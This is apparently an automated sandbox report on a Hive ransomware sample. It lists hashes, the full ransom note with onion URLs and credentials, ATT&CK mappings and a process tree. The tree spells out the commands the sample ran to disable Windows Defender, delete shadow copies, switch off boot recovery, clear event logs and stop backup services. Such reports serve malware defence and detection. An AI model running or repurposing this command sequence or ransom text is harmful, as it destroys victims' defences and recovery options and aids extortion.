hive | af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Analysis

max time kernel
1s
max time network
122s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
12-02-2024 07:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211xahcou.exe
Size

3.9MB
MD5

0e4d44dde522c07d09d9e3086cfae803
SHA1

d8dc26e2094869a0da78ecb47494c931419302dc
SHA256

33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512

ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP

49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Score

10^/10

hive evasion ransomware trojan

Malware Config

Extracted

Path

C:\Program Files\n8pw_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: fTP4dtHQ51ZX Password: 7zC1gVatfxGNUwxnLe4e To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.cv2gj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Processes:

MpCmdRun.exe

pid process

1748 MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive

pid	process
1748	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

2036 wevtutil.exe
1604 wevtutil.exe
2436 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2408 bcdedit.exe
1616 bcdedit.exe
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2668 sc.exe
2576 sc.exe
2612 sc.exe
2216 sc.exe
2312 sc.exe
2724 sc.exe
2584 sc.exe
2556 sc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2420 vssadmin.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2524 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1272 PING.EXE

pid	process
2036	wevtutil.exe
1604	wevtutil.exe
2436	wevtutil.exe

pid	process
2408	bcdedit.exe
1616	bcdedit.exe

pid	process
2668	sc.exe
2576	sc.exe
2612	sc.exe
2216	sc.exe
2312	sc.exe
2724	sc.exe
2584	sc.exe
2556	sc.exe

pid	process
2420	vssadmin.exe

pid	process
2524	notepad.exe

pid	process
1272	PING.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

211xahcou.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2476 wrote to memory of 2328	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2328	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2328	2476	211xahcou.exe	net.exe
PID 2328 wrote to memory of 2648	2328	net.exe	net1.exe
PID 2328 wrote to memory of 2648	2328	net.exe	net1.exe
PID 2328 wrote to memory of 2648	2328	net.exe	net1.exe
PID 2476 wrote to memory of 2356	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2356	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2356	2476	211xahcou.exe	net.exe
PID 2356 wrote to memory of 2664	2356	net.exe	net1.exe
PID 2356 wrote to memory of 2664	2356	net.exe	net1.exe
PID 2356 wrote to memory of 2664	2356	net.exe	net1.exe
PID 2476 wrote to memory of 2660	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2660	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2660	2476	211xahcou.exe	net.exe
PID 2660 wrote to memory of 2764	2660	net.exe	net1.exe
PID 2660 wrote to memory of 2764	2660	net.exe	net1.exe
PID 2660 wrote to memory of 2764	2660	net.exe	net1.exe
PID 2476 wrote to memory of 2780	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2780	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2780	2476	211xahcou.exe	net.exe
PID 2780 wrote to memory of 2848	2780	net.exe	net1.exe
PID 2780 wrote to memory of 2848	2780	net.exe	net1.exe
PID 2780 wrote to memory of 2848	2780	net.exe	net1.exe
PID 2476 wrote to memory of 3040	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 3040	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 3040	2476	211xahcou.exe	net.exe
PID 3040 wrote to memory of 2688	3040	net.exe	net1.exe
PID 3040 wrote to memory of 2688	3040	net.exe	net1.exe
PID 3040 wrote to memory of 2688	3040	net.exe	net1.exe
PID 2476 wrote to memory of 2092	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2092	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2092	2476	211xahcou.exe	net.exe
PID 2092 wrote to memory of 2856	2092	net.exe	net1.exe
PID 2092 wrote to memory of 2856	2092	net.exe	net1.exe
PID 2092 wrote to memory of 2856	2092	net.exe	net1.exe
PID 2476 wrote to memory of 2088	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2088	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 2088	2476	211xahcou.exe	net.exe
PID 2088 wrote to memory of 2984	2088	net.exe	net1.exe
PID 2088 wrote to memory of 2984	2088	net.exe	net1.exe
PID 2088 wrote to memory of 2984	2088	net.exe	net1.exe
PID 2476 wrote to memory of 1652	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 1652	2476	211xahcou.exe	net.exe
PID 2476 wrote to memory of 1652	2476	211xahcou.exe	net.exe
PID 1652 wrote to memory of 2332	1652	net.exe	net1.exe
PID 1652 wrote to memory of 2332	1652	net.exe	net1.exe
PID 1652 wrote to memory of 2332	1652	net.exe	net1.exe
PID 2476 wrote to memory of 2576	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2576	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2576	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2668	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2668	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2668	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2556	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2556	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2556	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2584	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2584	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2584	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2724	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2724	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2724	2476	211xahcou.exe	sc.exe
PID 2476 wrote to memory of 2312	2476	211xahcou.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\211xahcou.exe
"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1200
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:888
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:992
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2408
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1616
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  PID:696
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  PID:2036
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  PID:1604
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  PID:2436
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2420
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:832
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2024
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:588
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:564
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1484
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2740
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1728
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2000
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:3044
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:2084
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:2076
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1768
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1316
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:1640
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:576
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:684
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2944
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1312
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:2892
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:1920
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:2828
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1356
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:308
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1560
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2240
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2824
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:2020
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:1852
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2112
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:2988
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2948
- C:\Windows\system32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:2612
- C:\Windows\system32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:2216
- C:\Windows\system32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:2312
- C:\Windows\system32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:2724
- C:\Windows\system32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:2584
- C:\Windows\system32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:2556
- C:\Windows\system32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:2668
- C:\Windows\system32\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  - Launches sc.exe
  PID:2576
- C:\Windows\system32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1652
- C:\Windows\system32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2088
- C:\Windows\system32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2092
- C:\Windows\system32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3040
- C:\Windows\system32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2780
- C:\Windows\system32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2660
- C:\Windows\system32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2356
- C:\Windows\system32\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- C:\Windows\system32\notepad.exe
  notepad.exe C:\n8pw_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2524
- C:\Windows\system32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
  2⤵
  PID:1396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
1⤵
PID:2648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
1⤵
PID:2856

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
1⤵
- Deletes Windows Defender Definitions
PID:1748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
1⤵
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
PID:2772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
1⤵
PID:2332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
1⤵
PID:2984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
1⤵
PID:2688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
1⤵
PID:2848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
1⤵
PID:2764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
1⤵
PID:2664

C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
1⤵
- Runs ping.exe
PID:1272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
341B

MD5
f4393bdb40865ebd0eddf5a27b87ddbd

SHA1
823b5e046d08576ac33517eaa93c61665edbb65c

SHA256
87ff13b6c9f725a3fb2e5c8ef524cc5819601e2d8331822333087a72dd035efb

SHA512
73a1db5a02928e2f903ffae6c477e7ce3d313048a0faf2216eeb9183db9e7406c2abfd8e36861f5a8a96eca220fe2d6a7771b84820ce27df232c944e56b62257

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_ON.GIF.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
222B

MD5
a875cf9caadc406392ad4bbde44fd55c

SHA1
847e6491a3699254781e581f107becea8812ffe5

SHA256
fff5db9fafe7d0264df2c4135ca0a6252f4f4bddfc7b62471c2cca0a3fbf5954

SHA512
5b2bbdb377737bd4892e41ad1127b5767af9d7d873300d065190d03e7a130810290bdd44500a01758c1305b7e0d50bfa5694dc188f60aabbff5a9f679fc4c036

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
114B

MD5
b8fbbc73ddde31636552ab184b4e398f

SHA1
5cfbfaea56e979a07c083f2340b10a5894812d78

SHA256
3c3702253a4695b5bcb18a2565b1d49f9f32f5f9f2442fd1395197970fa34edb

SHA512
7f0f4b098e0d37ed403be8d54e2dcbc603791ddf00e3a21747c41ecfb829fdf664b6bddda8d51309e1229b197244a1d8ae23e1b3bf3348f99f84a7a8684db8d7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
113B

MD5
db9742e49c49c505b293a84518e95fa5

SHA1
406dae0b226900aad2ad2e10d8366651b848c053

SHA256
1c17b95e5098adb0c0e06aac8a8c7c50c6a5ef1b696465d548c8a922f1d3a653

SHA512
974917a72b2b3b783bb0ffcbfe0058489ae65ac0aa71ae86d77195780aeb7800848a3158fbe7ad8ddf9b30145d8a1a2c66f72484305ccf363b7981f105be295b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_IAAAACAAAAA0.cv2gj

Filesize
185B

MD5
973779cfa96b0be367e8718db325c4ba

SHA1
be1115e7d145c8181f82b66ed30b4d5dc60bdfb7

SHA256
09d2a546c57dc9fec8fd5efd059ab8e7e21d51f582fd678f05900efef154db0a

SHA512
baba3c85e1f49e2f3b1c26f3db0cedd7a340a67c8fd5ab80e70957418d658bf137ec32fe529c01f122b932a3961fd4739eb557588d239471aa84cdfe99aa9dfa

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_IAAAACAAAAA0.cv2gj

Filesize
496B

MD5
94f8f9cbbc7c55b6035f08f846d39cee

SHA1
2dad7a9174aea6a26301a00a7d3277595cfdca8f

SHA256
f1b55bf40b6fa794c1e614aa75985258a88e2165bef91eff545438b85baa5c3f

SHA512
6dabc2f1cc7872cff3682bb1d4e852d97e69cc7ae232dc9dbbb0fb3333bc3e3d99e9e2a2478cce03875abf9d2f27be964220586ae146af41484f78c98509c53c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
1KB

MD5
52236cec3798df288705441118df4bcc

SHA1
1fd595c15b27c07a7185cc39bcbf66c52641e32c

SHA256
71e4d48ed4515f17faa6505256314a8d6022e103714193785e7fcd08a36a051d

SHA512
0c949c6cf7c1d61978ae838e266c845cb9990ae574d6f1e80d96c5f87db15bca354aa4499ea80fa7fb47c8734b0db55d581b8e8cda07e1664423f957ef5f91e7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.SE.XML.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
806B

MD5
fc9a01384283f760b245bafde02893ca

SHA1
27787bad85297baad51216df565e409dfac1d440

SHA256
7bdb5be38475510a7c05a3444b122a62e8cf4c05b35e656ca4deccce4a55d968

SHA512
a35db9e5336b752fdd25db32ee0584fcd93c9c366ab3119d1e5cdd235c8f77e44170fdf2ce6c182d02df750ed89b85926c2cf4bfd4b4f6d634ec0c20c100c0e0

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
57B

MD5
adf99b54fd6f317b611320564167c305

SHA1
d3d80dd39b686e04bf31db6ac9335084e841ef73

SHA256
1b68454d53e781f8793547fde8fcb2f3b03b5c8134f37b9d8c4045cb8a5473f3

SHA512
65fb44cdaf01632d60ecf3b49ab1eb661982ee8b6a430dcf6d1e75789787c9e7356754cd071421ca44a1b32ab918be97a630b1b0ca722383eea56d40fa131642

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
12KB

MD5
cde2f530a5fbf43ab114eadf3c79507b

SHA1
b25148100e634c4627a653023faafaf439ca242d

SHA256
d7264f89122ed28e6834f1dd17ffa9ff867cd964f131bf1a77ccf4befe3ead74

SHA512
220010414a91a986ab5752fcb4f04ccd8ca8f390e4b33c9b91efa5649b0e1c846da9f428050efe83f97e0bea0abaceeaa53f93f0847f8ba63f68174ecfd39abd

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
8KB

MD5
eabe8f0eabe46d3e556d161a65f61cc6

SHA1
4bfbb452761850799a01c9e15ace0604afa1b0e3

SHA256
a0d2fef4d83f8de2ab887bac4377635b5e0cb0fd2de6ded90183b1ead97351f6

SHA512
8b2635f6d3e2e736501d1e0c07bd27c89307eaec096d24cf6e3ad55f352e7140898a7d3a2a7b4c0348407fe8df71189211b7cd829af4e8dce72c4ad186a53852

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_AAAAAAAAAAA0.cv2gj

Filesize
7KB

MD5
3eba477436bd5762cb3574f58754dc64

SHA1
034012c484d22b1be9546f36471a41b622c4a509

SHA256
d4241314fe2d8af3608ef6237828cb2213fdff3e6499ddcb85085d0833694a0b

SHA512
8e853123144081f17a0a5bc3ee7ed1a76ac7659b81fbfdd97a50c2f6cf5704ea708869016b88fbdfb9b024ec40926ab3c942622bb8b1adad45176c573388d7a7

Download Submit
C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif.H0MwuMW3axE2lxx-f42RCYSyWw654kPGzSizwr_H8fL_IAAAACAAAAA0.cv2gj

Filesize
153B

MD5
1e9d8f133a442da6b0c74d49bc84a341

SHA1
259edc45b4569427e8319895a444f4295d54348f

SHA256
1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

SHA512
63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

Download Submit
